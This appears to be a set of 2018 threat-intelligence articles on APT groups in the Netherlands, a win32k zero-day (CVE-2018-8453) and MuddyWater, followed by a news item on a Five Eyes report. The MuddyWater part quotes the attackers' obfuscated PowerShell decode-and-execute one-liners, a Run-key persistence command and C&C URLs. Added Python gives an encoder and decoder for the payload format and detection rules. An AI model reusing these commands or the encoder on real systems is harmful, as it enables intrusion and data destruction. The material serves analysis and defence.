Sofacy, also known as Pawn Storm, Fancy Bear and many other names, is an active APT group that we have followed since 2011. It is known for using spear-phishing emails to infect targets and for the active deployment of 0-days. In 2015, Trend Micro researchers reported that the group had targeted the MH17 investigation team. Last year, the Volkskrant published an article alleging it tried to infect several Dutch ministries. Then there is the October 4, 2018 news of four alleged Sofacy members having been caught in April 2018 trying to hack the OPCW. Even though we cannot confirm these last two incidents, since we are not involved, we have observed several targets in the Netherlands infected with Sofacy. Interestingly, we observe fewer deployments of Xagent (one of Sofacy’s modules) after April 2018. Although one new Xagent deployment was noted in August 2018, it seems that the group pushed fewer, and then only new, deployments from April through June 2018.

Hades
Hades is the name given to the group held responsible for the Olympic Destroyer malware that was found targeting the 2018 Winter Olympic Games in South Korea. Our initial thought was that the malware was related to the Lazarus group, because several of our Yara rules had 100% matches with the malware. However, after careful research we found many false flags that pointed to different APT groups. A few months later, in May 2018 (not long after the OPCW incident took place), we found that Hades had returned and was now targeting financial institutions and chemical threat prevention laboratories. Given this shift of interest, it is no surprise that entities in the Netherlands were targeted as well.

Buhtrap
Buhtrap is one of the groups that targets financial institutions with the ultimate goal of stealing money. Its tactics, techniques and procedures (TTPs) don’t differ extensively from those of traditional APT groups. Buhtrap is one of those (Carbanak and Tyupkin are others) that started by infecting financial institutions in Russia and Ukraine, but after a while shifted its focus to other parts of the world. We found Buhtrap activity in the Netherlands in 2017.

The Lamberts
In March 2017, WikiLeaks published online a series of documents that they call “Vault 7”. Some of these documents feature malware that resembles that used by the Lamberts, a toolkit that has been used for several years, with most of its activity occurring in 2013 and 2014. One of The Lamberts’ variants we have been investigating is the “Green Lamberts”. We were surprised to see quite a few infections in the Netherlands, when the majority of attacks target Iran. We do not have any insight into the profile of the victims located in the Netherlands. Nevertheless, the fact that Lamberts is active in the Netherlands shows a possible shift in focus, and reminds us that for APT groups, borders do not exist.

Turla
Turla, also known as Uroboros, is a very active APT group, believed to be connected to many high-profile incidents such as the US Central Command attack in 2008 and the breach of RUAG (a Swiss military contractor). Other Turla targets include ministries and governmental organizations. Given all this, the Netherlands is a logical target for the Turla group. In fact, we would have been surprised not to have found any Turla infections in the Netherlands.

Gatak
Gatak, which also goes by the names of Stegoloader and GOLD, is a group that engages in data theft using watering hole attacks. It has been active since at least 2015, and its main interest is in intellectual property. Even though the use of watering hole attacks means the group does not have full control over who it infects, it has been able to hit a couple of high profile targets. In this case, our sinkhole database enabled us to determine that one of those was a high profile target in the Netherlands.

Putter Panda
In 2015, the Dutch chip maker, ASML was allegedly breached by Putter Panda. ASML acknowledged the breach and stated that one file was stolen. No further details are publicly available, although there was an episode of the TV program “KRO reporter“, partially dedicated to the breach. ASML is one of relatively few high-tech companies in the Netherlands. The fact that it has been breached is a clear sign that foreign threat actors are aware of and interested in industrial espionage in the Netherlands.

Animal Farm
Animal Farm is a group that has been active since at least 2009. A relatively advanced threat actor, it has been targeting a variety of organizations over the past years. Victims include governmental organizations, military contractors, activists and journalists. Even though the group is mainly focused on French speaking countries, we still found a few infections in the Netherlands.

Conclusion
Although our visibility of threat actor activity in the Netherlands is incomplete, the results are nevertheless surprising. Some groups we did not expect to see appear to be active in the country (such as the Lamberts). However, upon further thought, and especially when looking at potential targets located in the Netherlands and comparing this with the interests of some of the APT groups, their activity in the Netherlands makes sense.

The presence of both expected and unexpected threat actors is a good argument for organizations staying informed of the latest developments in cyberspace, particularly through threat intelligence reports. Because if you know what APT groups are up to, which organisations they target and what TTPs they use, you can implement the protection you need to stay one step ahead of them.

Such precautions are important, because one of the most stunning findings from the review of sinkhole databases was the number of organizations infected using “ordinary cybercrime malware”. We saw infections among airlines, airports and other major companies (although it should be noted that this happens in other countries as well, not just in the Netherlands). It demonstrates again that it is not so difficult for (APT) groups to breach valuable targets and that basic cyber hygiene is important for everybody.

As a final note, one should always be careful about deriving hard conclusions from APT findings, particularly in terms of attribution. For example, even though we saw Olympic Destroyer malware being used to target chemical threat prevention laboratories shortly after the OPCW incident, this is not conclusive evidence that the groups behind these attacks are the same, or even related. However, using this fact to monitor your network for the presence of Olympic Destroyer malware if you think you might be a potential Sofacy target – and vice versa – seems like a good approach.


Zero-day exploit (CVE-2018-8453) used in targeted attacks
13.10.2018 Kaspersky
Exploit, Vulnerability

Yesterday, Microsoft published their security bulletin, which patches CVE-2018-8453, among others. It is a vulnerability in win32k.sys discovered by Kaspersky Lab in August. We reported this vulnerability to Microsoft on August 17, 2018. Microsoft confirmed the vulnerability and designated it CVE-2018-8453.

In August 2018 our Automatic Exploit Prevention (AEP) systems detected an attempt to exploit a vulnerability in Microsoft Windows operating system. Further analysis into this case led us to uncover a zero-day vulnerability in win32k.sys. The exploit was executed by the first stage of a malware installer to get necessary privileges for persistence on the victim’s system. The code of the exploit is of high quality and written with the aim of reliably exploiting as many different MS Windows builds as possible, including MS Windows 10 RS4.

So far, we detected a very limited number of attacks using this vulnerability. The victims are located in the Middle East.

Kaspersky Lab products detected this exploit proactively through the following technologies:

Behavioral detection engine and Automatic Exploit Prevention for endpoints
Advanced Sandboxing and Anti Malware engine for Kaspersky Anti Targeted Attack Platform (KATA)
Kaspersky Lab Verdicts for the artifacts in this campaign are:

HEUR:Exploit.Win32.Generic
HEUR:Trojan.Win32.Generic
PDM:Exploit.Win32.Generic
More information about this attack is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com

Technical details
CVE-2018-8453 is a Use-After-Free inside win32kfull!xxxDestroyWindow that resembles an older vulnerability — CVE-2017-0263. CVE-2017-0263 was originally deployed by the Sofacy APT, together with a PostScript exploit, back in 2017.

For technical analysis of the vulnerability, we completely reverse-engineered the ITW exploit sample obtained and rewrote it into a full Proof of Concept.

The exploitation of this vulnerability depends on a sequence of events that are performed from hooks set on three usermode callback functions – fnDWORD, fnNCDESTROY, and fnINLPCREATESTRUCT. The exploit installs these hooks by replacing the function pointers in the KernelCallbackTable:

Hooked functions in the Kernel Callback Table

Inside the fnINLPCREATESTRUCT hook, the exploit initializes a “SysShadow” window by explicitly assigning a position to it:

Usermode hook on fnINLPCREATESTRUCT initializes SysShadow

When processing the WM_LBUTTONDOWN message, the fnDWORD hook executes the DestroyWindow function on the parent, which results in the window being marked as free and subsequently freed by the garbage collector.

The issue lies inside the fnNCDESTROY hook that is performed during execution of the DestroyWindow function. This hook executes the NtUserSetWindowFNID syscall, which contains a flawed logic to change the fnid status of the window without properly checking if it is set to FNID_FREED.

Vulnerable code inside NtUserSetWindowFNID

The fnid status of the window is located at offset 0x02a in the tagWND structure:

kd> dt win32k!tagWND
   +0x02a fnid : Uint2B

When the scrollbar is initially created, it has the value FNID_SCROLLBAR (0x029A).

The next diagram shows the value of fnid before and after execution of the NtUserSetWindowFNID syscall:

Scrollbar fnid before and after execution of NtUserSetWindowFNID syscall

We can check what the new fnid value is by verifying it against the ReactOS source code:

/* FNIDs for NtUserSetWindowFNID, NtUserMessageCall */
#define FNID_SCROLLBAR 0x029A
#define FNID_BUTTON 0x02A1
#define FNID_FREED 0x8000 /* Window being Freed... */

This action results in the first scrollbar being destroyed, while the system still maintains a reference to a “SysShadow” class, as the scrollbar fnid is no longer marked as FNID_FREED, but as FNID_BUTTON instead.

To successfully reclaim the freed memory pool, the exploit contains a number of different feng shui tactics. The spray procedure is dependent on the exploited Windows version, and because the exploit targets a wide range of operating systems, it includes five separate functions for spraying:

Heap spraying procedures supported in the exploit

For the latest supported version (Windows 10 RS4), the spray tactic is quite complicated. The kernel is sprayed with bitmap objects of different size. This is required to exhaust the memory allocator to eventually bypass the Low Fragmentation Heap security mitigations that were significantly improved in the latest Windows builds:

Heap Feng Shui technique for Windows RS4 17134

This leads to the following memory layout, where USERTAG_SCROLLTRACK is the freed pool allocation:

Freed scrollbar heap allocation

When another scrollbar is allocated, the SysShadow class memory reference is reused, but its contents are attacker-controlled, because the freed Usst (ffffee30044b2a10) and Gpbm (ffffee30044b2a90) pools were merged into a single block:

Freed allocation is merged with the following pool

This results in a powerful arbitrary kernel read/write primitive built on GDI Bitmap objects that works even on the latest Windows versions.

Following successful exploitation, a slightly modified Token-stealing payload is used to swap the current process Token value with the one from the SYSTEM EPROCESS structure:

Modified Token-stealing payload process

So far, we’ve observed the usage of this exploit in a small number of targeted attacks, when the exploit is packaged in a malware installer. The installer requires system privileges to install its payload. The payload is a sophisticated implant, used by the attackers for persistent access to the victims’ machines. Some of its main characteristics include:

Encrypting the main payload using AES-256-CBC with the SHA-1 of the SMBIOS UUID (this makes it impossible to decrypt the payload on machines other than the victim, if the SMBIOS UUID is not known)
Using Microsoft BITS (Background Intelligent Transfer Service) for communicating with its C&C servers, an unusual technique
Storing the main payload in a randomly named file on disk; the loader contains a hash of the filename and attempts to find the payload by comparing the filename hash for all files in the Windows directory
More details on this malware and the APT behind it are available to customers of Kaspersky Intelligence Reporting. Contact: intelreports@kaspersky.com

Victims
The distribution of the attack seems to be highly targeted, affecting less than a dozen victims in the Middle East region, according to our telemetry.

Attribution
During our investigation, we discovered the attackers were using a PowerShell backdoor that has previously been seen exclusively used by the FruityArmor APT. There is also an overlap in the domains used for C2 between this new set of activity and previous FruityArmor campaigns. That makes us assess with medium confidence that FruityArmor is responsible for the attacks leveraging CVE-2018-8453.

Conclusion
Even though deploying 0-days seems to be more frequent than it used to be, this is only the second time we have spotted FruityArmor using one to distribute its malware. This points to the resources and sophistication of this actor, as well as to the advanced final stage it distributes.

So far, this campaign has been extremely targeted, affecting a very low number of victims in the Middle East region, probably persons of interest for the attackers. However, the victimology is not clear, especially with such a small number of victims involved.

We believe that although FruityArmor’s activity has been slowly increasing during the last two years, the extremely targeted nature of the attacks helps them fly below the radar.

Appendix I – Indicators of compromise:
Domains:
weekendstrips[.]net
shelves-design[.]com


MuddyWater expands operations

13.10.2018 Kaspersky APT

Summary
MuddyWater is a relatively new APT that surfaced in 2017. According to past telemetry it has focused mainly on governmental targets in Iraq and Saudi Arabia, although the group behind MuddyWater is also known to target other countries in the Middle East, Europe and the US. We recently noticed a large number of spear-phishing documents that appear to target government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in addition to the continued targeting of Iraq and Saudi Arabia; other victims were also detected in Mali, Austria, Russia, Iran and Bahrain. These new documents appeared throughout 2018 and escalated from May onwards. The attacks are still ongoing.

The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks. In the advanced stages of this research, we were able not only to observe additional files and tools from the attackers’ arsenal but also some OPSEC mistakes made by the attackers.

Previous related research:
https://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html?m=1
https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/
https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/
https://www.sekoia.fr/blog/falling-on-muddywater/

Decoy images by country
Jordan

The Hashemite Kingdom of Jordan, Ministry of Justice (mwjo.doc) DAMAMAX.doc
Turkey

Turkey’s General Directorate of Security Turkey’s Directorate General of Coastal Safety

Turkey’s General Directorate of Security (Onemli Rapor.doc) Turkey’s Ministry of the Interior (Early election.doc)
Saudi Arabia

Document signed by the Major General Pilot, commander of the Saudi Royal Air Force

KSA King Saud University (KSU) KSA King Saud University (KSU)
Azerbaijan

İnkişaf üçün görüş.doc (meeting for development)

Iraq

Iraqi Ministry of Foreign Affairs Government of Iraq, the Treasury of the Council of Ministers
Pakistan

ECP.doc National Assembly of Pakistan.doc

P.Police.doc
Afghanistan

President.doc, E-government of Afghanistan

Technical details
Below is a description of the malware extraction and execution flow, starting from the initial infection vector, running VBA code via a macro and then dropping the PowerShell code that establishes command-center communications, sends victim system information and then receives commands supported by the malware.

The initial infection vector
The initial infection starts with macro-enabled Office 97-2003 Word files whose macros are usually password-protected to hinder static analysis.

Malicious obfuscated VBA code is executed when the macro is first enabled. In some cases, the malicious macro is also executed when the user activates a fake text box.

The macro payload analysis, dropped files and registry keys
The macro payload, which is Base64 encoded, does the following:

Drops two or three files into the “ProgramData” folder. The dropped files are either in the root of the “ProgramData” folder or in a subdirectory. The file names may vary from one version of the malware to another.
\EventManager.dll
\EventManager.logs
\WindowsDefenderService.inil

Adds a registry entry in the current user’s RUN key (HKCU) for later execution when the user next logs in. In some cases, the macro spawns the malicious payload/process instantly without waiting for the next time the user logs in. The registry keys and executables may vary from one version of the malware to another.
Name: WindowsDefenderUpdater
Type: REG_EXPAND_SZ
Data: c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\EventManager.logs,Defender,1,

The next time the user logs in, the dropped payload will be executed. The executables have been chosen specifically for bypassing whitelisting solutions since they are all from Microsoft and very likely whitelisted. Regardless of the file extensions, the files dropped by the macro are EITHER INF, SCT and text files OR VBS and text files.

Case 1: INF, SCT and text files dropped by the macro
INF is launched via the advpack.dll “LaunchINFSection” function.
INF registers the SCT file (scriptlet file) via scrobj.dll (Microsoft Scriptlet library).
Via WMI (winmgmt), the JavaScript or VBScript code in the SCT file spawns a PowerShell one-liner which finally consumes the text file.
powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\WindowsDefenderService.ini);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));

Figures (not reproduced here): the PowerShell one-liner, the encoded text file, and the Case 1 execution flow.
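The Case 1 one-liner is a small custom decoder rather than Base64, so the dropped text file can be recovered offline without ever handing it to iex. The following Python is an added example (not MuddyWater’s code and not from the Kaspersky report): decode_dragon re-implements the one-liner’s arithmetic step by step, and encode_dragon is a reconstructed inverse (an assumption, not recovered from the attackers’ tooling) so a sample can be round-tripped. It assumes the file is a single line, as the one-liner itself does through $s.length; the plaintext strings are constructed.

```python
"""Offline decoder for the custom base-52 text encoding consumed by the Case 1 one-liner.

Added example: mirrors the PowerShell loop above so an analyst can decode the dropped
.ini file without executing it. The encoder is a reconstruction of the inverse
transform (an assumption), used here to produce test input and to show the layout.
"""

DIGIT_BASE = 52      # $v = ($v*52) + ...
DIGIT_OFFSET = 40    # ([Int32][char]$s[$c] - 40): digit characters are '(' .. '['


def decode_dragon(encoded: str) -> str:
    """Every 3 characters form one base-52 number; its bytes are emitted low byte first,
    NUL bytes are skipped, and the whole buffer is reversed before reaching iex."""
    out = []
    v = 0
    for i, ch in enumerate(encoded):
        v = v * DIGIT_BASE + (ord(ch) - DIGIT_OFFSET)
        if (i + 1) % 3 == 0:
            while v != 0:
                low = v % 256
                if low > 0:                       # if($vv -gt 0): NULs are dropped
                    out.append(chr(low))
                # [Int32]($v/256) in PowerShell rounds to nearest even instead of
                # truncating; Python's round() does the same, so emulate it exactly.
                # For ASCII payloads (all bytes < 128) this equals integer division.
                v = round(v / 256)
    out.reverse()                                 # [array]::Reverse($d)
    return "".join(out)


def encode_dragon(plaintext: str) -> str:
    """Reconstructed inverse: pair bytes as (high, low), write each pair as three base-52
    digits, and emit the triples in reverse so the decoder's final Reverse() restores
    the original order. ASCII only, which keeps the decoder's rounding harmless."""
    data = plaintext.encode("ascii")
    triples = []
    for i in range(0, len(data), 2):
        high = data[i]
        low = data[i + 1] if i + 1 < len(data) else 0   # odd length: NUL pad, skipped by decoder
        v = high * 256 + low
        digits = []
        for _ in range(3):
            digits.append(chr(DIGIT_OFFSET + v % DIGIT_BASE))
            v //= DIGIT_BASE
        triples.append("".join(reversed(digits)))        # most significant digit first
    return "".join(reversed(triples))


if __name__ == "__main__":
    # Constructed sample, not a real stage-2 script.
    sample = "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
    blob = encode_dragon(sample)
    print(blob)
    print(decode_dragon(blob))
```

To use it on a sample, read the ProgramData .ini named in the one-liner and pass its contents to decode_dragon; the output is the next PowerShell stage as text, which can then be deobfuscated further without running it. Note that the PowerShell loop silently swallows NUL bytes and rounds rather than truncates on division, so the encoding is only lossless for 7-bit script text.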

Case 2: VBS and text files dropped by the macro
The VBS file decodes itself and calls mshta.exe, passing on one line of VBScript code to it, which in turn spawns a PowerShell one-liner which finally consumes the text file (usually Base64-encoded text).

powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));

Figures (not reproduced here): the PowerShell one-liner, the encoded text file, and the Case 2 execution flow.

The PowerShell code
When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it. The resulting code has multiple layers of obfuscation.

The first thing the PowerShell code does is to disable office “Macro Warnings” and “Protected View“. This is to ensure future attacks don’t require user interaction. It also allows macro code to access internal VBA objects for stealthier macro code execution in future attacks.

Next, it checks the running processes against a list of hard-coded process names; if any are found, the machine is forcefully rebooted. The names are linked to various tools used by malware researchers.

"win32_remote", "win64_remote64", "ollydbg", "ProcessHacker", "tcpview", "autoruns", "autorunsc", "filemon", "procmon", "regmon", "procexp", "idaq", "idaq64", "ImmunityDebugger", "Wireshark",
"dumpcap", "HookExplorer", "ImportREC", "PETools", "LordPE", "dumpcap", "SysInspector", "proc_analyzer", "sysAnalyzer", "sniff_hit", "windbg", "joeboxcontrol", "joeboxserver"

Blacklisted process names in the malware

In some cases, it calculates the checksum of each running process name, and if it matches any hard-coded checksums, it causes a BSOD via the ntdll.dll “NtRaiseHardError” function.

CnC communication
A URL is selected at random from a long list of embedded URLs held in an array named $dragon_middle. The selected URL is subsequently used for communication with the CnC server. If it can’t send data to the chosen CnC URL, it picks another random URL from $dragon_middle, sleeps for between one and 30 seconds and loops again.

Victim system reconnaissance
The code then tries to obtain the victim’s public IP via “https://api.ipify.org/”.

The public IP is then POSTed along with OS Version, Internal IP, Machine Name, Domain Name, UserName after being encrypted to the previously chosen URL to register a new victim. This allows the attackers to accept or reject victims depending on their IPs, countries, geolocations, target enterprises, etc. Depending on the response from the attacker’s CnC, the victim is assigned an ID $sysid. This ID is sent to the CnC with each request for commands to execute.

Supported commands
“upload“, “screenshot“, “Excel“, “Outlook“, “risk“, “reboot“, “shutdown“, “clean“. These commands vary from one version to another.

The “screenshot” command takes a screenshot that is saved as a .PNG file in “ProgramData“.
The “Excel” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Excel to execute this PowerShell script via DDE.
The “Outlook” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Outlook via COM, via MSHTA.exe, to execute it.
The “risk” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Explorer.exe via COM interaction to execute it.
The “upload” command downloads files from the CnC and saves them locally in “C:\ProgramData“.
The “clean” command destroys the victim’s disk drives C, D, E, F and then reboots.
The “reboot” and “shutdown” commands immediately reboot and shut down the victim’s machine.
In one version of the malware, the code checks if the “ProgramData” folder has folders or files with the keywords “Kasper“, “Panda“, or “ESET“.

Victimology

Most victims of MuddyWater were found in Jordan, Turkey, Iraq, Pakistan, Saudi Arabia, Afghanistan and Azerbaijan. Other victims were also recorded in Russia, Iran, Bahrain, Austria and Mali. The malicious decoy documents used in the attacks suggest they are geopolitically motivated, targeting sensitive personnel and organizations.

Attacker deception and attribution
The deobfuscated PowerShell code used by the MuddyWater group resembles previously seen PowerShell scripts that most likely served as prototypes. Multiple documents used in the attacks also contain embedded paths from their authors’ machines. These paths are embedded by Office under various circumstances, for instance, when somebody adds a binary object (an OLE control, e.g. text box or command button) into a Word document. The paths discovered are:

• C:\Users\leo\AppData\Local\Temp\Word8.0\MSForms.exd
• C:\Users\poopak\AppData\Local\Temp\Word8.0\MSForms.exd
• C:\Users\Vendetta\AppData\Local\Temp\Word8.0\MSForms.exd
• C:\Users\Turk\AppData\Local\Temp\Word8.0\MSForms.exd

Leo, Poopak, Vendetta and Turk are the usernames of those creating the documents or the templates on which they are based. Turk could point to a person of Turkish origin. Poopak is a Persian girl’s name or might suggest the authors are not entirely happy with “Pak”, which could be short for Pakistan. Leo could be one of the attacker’s names. We also don’t rule out the possibility of false flags, with the attackers using random usernames to confuse researchers.

In multiple instances, we have also found Chinese text inside the samples, possibly indicating the reuse of code by the attackers.

无法连接到网址,请等待龙…
无法访问本地计算机寄存器
任务计划程序访问被拒绝

Chinese text found in PowerShell code in multiple samples

Unable to connect to the URL, please wait for the dragon…
Unable to access local computer register
Task Scheduler access denied

Translation of Chinese text

We have also noticed that for some samples, e.g. 5a42a712e3b3cfa1db32d9e3d832f8f1, the PowerShell code had only three CnC URLs, which leads us to believe that most of the CnC URLs in $dragon_middle found in other samples could actually be ‘noise’ to distract researchers or trigger false positives.

http://www.cankayasrc[.]com/style/js/main.php
http://ektamservis[.]com/includes/main.php
http://gtme[.]ae/font-awesome/css/main.php

Recommendations for organizations
Effective protection from targeted attacks focuses on advanced detective, preventive and investigative capabilities via solutions and training, allowing an organization to control any activities on their network or suspicious files on user systems.

The best way to prevent attackers from finding and leveraging security holes, is to eliminate the holes altogether, including those related to improper system configurations or errors in proprietary applications. Organizations are also recommended to implement the following steps for an enhanced level of protection at their premises.

Enforce PowerShell Constrained Language Mode: the stage-1 code relies on IEX, Add-Type and New-Object, which that mode restricts.
Set the PowerShell execution policy to “AllSigned” via GPO, bearing in mind that execution policy is not a security boundary: the one-liners above pass -exec Bypass, so this only raises the bar and must be backed by application control.
Deploy a whitelisting solution that can block the parent-child process chains seen here, such as mshta.exe, wscript.exe or WMI spawning powershell.exe.
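The parent-child chains and command-line markers described in the technical details (rundll32 advpack.dll,LaunchINFSection reading from ProgramData, scrobj.dll, WMI/mshta.exe/wscript.exe launching powershell.exe with -exec Bypass and iex over a file in ProgramData) as detection logic run over sample events. This is an added example, not Kaspersky’s detection content: the events are constructed Sysmon-style process-creation records, the .vbs file name is a placeholder, and the assumption that a process started through WMI’s Win32_Process.Create shows WmiPrvSE.exe as its parent is mine, not a statement from the page.

```python
"""Process-chain detection for the two MuddyWater stage-1 execution flows.

Added example with constructed Sysmon-style process-creation events; not Kaspersky's
detection logic and not real telemetry.
"""
import re

# Constructed events (Sysmon Event ID 1 style: pid, parent pid, image, command line).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # Case 1: Run-key rundll32 -> INF -> SCT -> WMI -> PowerShell. Assumption: a process
    # created through WMI (Win32_Process.Create) has WmiPrvSE.exe as its parent.
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\EventManager.logs,Defender,1,"},
    {"pid": 210, "ppid": 1, "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": "WmiPrvSE.exe -secured -Embedding"},
    {"pid": 220, "ppid": 210, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\WindowsDefenderService.ini);iex([String]::Join('',$d));"},
    # Case 2: VBS via wscript -> mshta -> PowerShell (the .vbs name is a placeholder).
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\ProgramData\ZIPSDK\dropper.vbs"},
    {"pid": 310, "ppid": 300, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe vbscript:Execute(...)"},
    {"pid": 320, "ppid": 310, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));"},
    # Benign interactive PowerShell from cmd.exe: must not alert.
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 410, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service"},
]

# Command-line rules: every pattern in the list must match, in any order.
CMDLINE_RULES = [
    ("advpack_launchinfsection_programdata",
     [r"advpack\.dll,\s*LaunchINFSection", r"ProgramData"]),
    ("scrobj_scriptlet",                     # the INF registers the .sct through scrobj.dll
     [r"scrobj\.dll"]),
    ("powershell_bypass_iex_programdata",    # -exec Bypass + iex + payload read from ProgramData
     [r"-exec(?:utionpolicy)?\s+bypass", r"\biex\b", r"ProgramData"]),
]
COMPILED_RULES = [(name, [re.compile(p, re.I) for p in pats]) for name, pats in CMDLINE_RULES]

# Child image -> parent images that are suspicious for it (chains named in the write-up).
SUSPICIOUS_PARENTS = {
    "powershell.exe": {"mshta.exe", "wmiprvse.exe", "wscript.exe"},
    "mshta.exe": {"wscript.exe"},
}


def image_name(event):
    """Lower-cased file name of the process image."""
    return event["image"].rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return (pid, rule) alerts for command-line matches and suspicious parent-child pairs."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        for name, pats in COMPILED_RULES:
            if all(p.search(e["cmdline"]) for p in pats):
                alerts.append((e["pid"], name))
        parent = by_pid.get(e["ppid"])
        child = image_name(e)
        if parent is not None and image_name(parent) in SUSPICIOUS_PARENTS.get(child, ()):
            alerts.append((e["pid"], f"{image_name(parent)}->{child}"))
    return alerts


if __name__ == "__main__":
    for pid, rule in analyze(SAMPLE_EVENTS):
        print(pid, rule)
```

The parent-child rules are the part worth carrying into a real whitelisting or EDR policy, since they hold even when the attackers rename the dropped files; the command-line rules are tied to the specific one-liners and should be expected to drift between versions.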
Conclusion
The MuddyWater group has carried out a large number of attacks and demonstrated advanced social engineering, in addition to the active development of attacks, infrastructure and the use of new methods and techniques. The attackers are actively improving their toolkit in an effort to minimize their exposure to security products and services. Kaspersky Lab expects these types of attacks to intensify in the near future.

In order to protect your company from malware, Kaspersky Lab researchers recommend implementing the following measures:

Educate general staff to recognize malicious behavior such as phishing links.
Educate information security staff to have full configuration, investigative and hunting abilities.
Use a proven corporate-grade security solution in combination with anti-targeted attack solutions capable of detecting attacks by analyzing network anomalies.
Provide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for targeted attack prevention and discovery, such as indicators of compromise and YARA rules.
Make sure enterprise-grade patch management processes are well established and executed.
High-profile organizations should have elevated levels of cybersecurity; attacks against them are inevitable and are unlikely to ever cease.

Additional information
In the advanced stages of this research, we were able not only to observe additional files and tools from the attackers’ arsenal but also some OPSEC mistakes made by the attackers.

Further details about the attackers’ arsenal, additional indicators of compromise, YARA rules and attribution information are available to customers of Kaspersky Intelligence Reporting. Contact: intelreports@kaspersky.com

Indicators of compromise
File names
%SystemDrive%\ProgramData\EventManager.dll
%SystemDrive%\ProgramData\EventManager.logs
%SystemDrive%\ProgramData\WindowsDefenderService.ini
%SystemDrive%\ProgramData\Defender.sct
%SystemDrive%\ProgramData\DefenderService.inf
%SystemDrive%\ProgramData\WindowsDefender.ini
%SystemDrive%\ProgramData\ZIPSDK\InstallConfNT.vbs
%SystemDrive%\ProgramData\ZIPSDK\ProjectConfManagerNT.ini
%SystemDrive%\ProgramData\WindowsDefenderTask.ini
%SystemDrive%\ProgramData\WindowsDefenderTask.txt
%SystemDrive%\ProgramData\WindowsDefenderTask.xml
%SystemDrive%\ProgramData\DefenderNT\ConfigRegister.vbs
%SystemDrive%\ProgramData\DefenderNT\SetupConf.ini
%SystemDrive%\ProgramData\ASDKiMalwareSDK\ProjectConfSDK.vbs
%SystemDrive%\ProgramData\ASDKiMalwareSDK\SetupConfSDK.ini
%SystemDrive%\ProgramData\FirefoxSDK\ConfigRegisterSDK.ini
%SystemDrive%\ProgramData\FirefoxSDK\ConfigRegisterSDK.vbs
%SystemDrive%\ProgramData\OneDrive.dll
%SystemDrive%\ProgramData\OneDrive.html
%SystemDrive%\ProgramData\OneDrive.ini
%SystemDrive%\ProgramData\WindowsNT\WindowsNT.ini
%SystemDrive%\ProgramData\WindowsNT\WindowsNT.vbs
%SystemDrive%\ProgramData\SYSTEM32SDK\ConfManagerNT.vbs
%SystemDrive%\ProgramData\SYSTEM32SDK\ProjectConfManagerNT.ini
%windir%\System32\Tasks\Microsoft\WindowsDefenderUpdater
%windir%\System32\Tasks\Microsoft\MicrosoftOneDrive
%windir%\System32\Tasks\Microsoft\WindowsDifenderUpdate
%windir%\System32\Tasks\Microsoft\WindowsSystem32SDK
%windir%\System32\Tasks\Microsoft\WindowsDefenderSDK
%windir%\System32\Tasks\Microsoft\WindowsMalwareDefenderSDK
%windir%\System32\Tasks\Microsoft\WindowsMalwareByteSDK



'Five Eyes' Agencies Release Joint Report on Hacking Tools
12.10.2018 securityweek
BigBrothers

Cybersecurity agencies in the United States, United Kingdom, Canada, Australia and New Zealand have released a joint report describing five of the most commonly used hacking tools.

The report was written by experts at the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC), and the US National Cybersecurity and Communications Integration Center (NCCIC).

The goal of the report, its authors said, is to provide network defenders and system administrators advice on how to detect the tools and limit their effectiveness.

Five types of tools are described, including remote access trojans (RATs), web shells, lateral movement frameworks, command and control (C&C) obfuscators, and credential stealers – all of which can be used after the targeted system has been compromised.

